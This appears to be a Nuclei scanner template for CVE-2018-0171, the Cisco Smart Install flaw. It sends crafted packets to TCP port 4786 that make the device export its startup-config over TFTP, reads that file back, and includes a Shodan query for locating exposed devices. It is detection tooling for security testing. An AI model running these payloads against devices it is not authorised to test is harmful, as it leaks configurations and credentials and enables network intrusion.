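id: CVE-2018-0171

info:
  name: Cisco Smart Install - Configuration Download
  author: ritikchaddha,matejsmycka
  severity: critical
  description: |
    A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data.
  reference:
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
    - https://nvd.nist.gov/vuln/detail/CVE-2018-0171
    - https://github.com/AlrikRr/Cisco-Smart-Exploit
    - http://www.securitytracker.com/id/1040580
    - https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-0171
    cwe-id: CWE-20,CWE-787
    epss-score: 0.93123
    epss-percentile: 0.99786
    cpe: cpe:2.3:o:cisco:ios:15.2\(5\)e:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cisco
    product: ios
    shodan-query: 'port:4786 "Smart Install"'
  tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev,udp,vkev

# Two-step check: the tcp step talks Smart Install on 4786, the javascript
# step then reads the exposed file back over TFTP (UDP/69). The matcher in
# the tcp step is an always-true internal marker so the flow can proceed.
flow: tcp(1) && javascript(1)

tcp:
  - inputs:
      - data: 00000001000000010000000A00000050FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF555CCA6800000000000000000000000000000000FFFFFFFF00000001
        type: hex
      # The ASCII portion of this message reads "configure tftp-server nvram:startup-config".
      - data: 000000010000000100000008000001680001001400000001000000000021D863A560000000020154636F6E66696775726520746674702D736572766572206E7672616D3A737461727475702D636F6E666967000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
        type: hex
    host:
      - "{{Hostname}}"
    port: 4786
    matchers:
      - type: word
        part: raw
        words:
          - ""
        internal: true

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);
    code: |
      // TFTP read request (opcode 1, octet mode) for startup-config.
      let packet = bytes.NewBuffer();
      let message = "\x00\x01startup-config\x00octet\x00";
      packet.WriteString(message);
      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      let resp;
      try {
        conn.SendHex(packet.Hex());
        resp = conn.Recv(4096);
        // Send a malformed packet, otherwise the TFTP server will not respond for around a minute.
        let packet2 = bytes.NewBuffer();
        let message2 = "\x00\x05error";
        packet2.WriteString(message2);
        conn.SendHex(packet2.Hex());
      } finally {
        // Always release the UDP socket, even if Recv throws on timeout.
        conn.Close();
      }
      // Last expression is the value returned to the matchers/extractors.
      resp;
    args:
      Host: "{{Host}}"
      Port: 69
    matchers:
      - type: word
        words:
          - 'boot-start-marker'
          - 'version'
          - 'NVRAM'
        condition: and
    extractors:
      - type: regex
        regex:
          - "version\\s+(\\d+\\.\\d+)"
# NOTE: the digest below was computed over the previous template text; any edit to this
# file (including the ones above) requires re-signing the template or signature verification fails.
# digest: 4a0a00473045022100a072aed4e1f1b0608e853a90b7026aa31622663d0e0309ef4178a789a5dffb3802200dcaccd55f43030c8adf16004a0f2c03f5891b302ec4cd5529a403f25e9eb103:922c64590222798bb761d5b6d8e72950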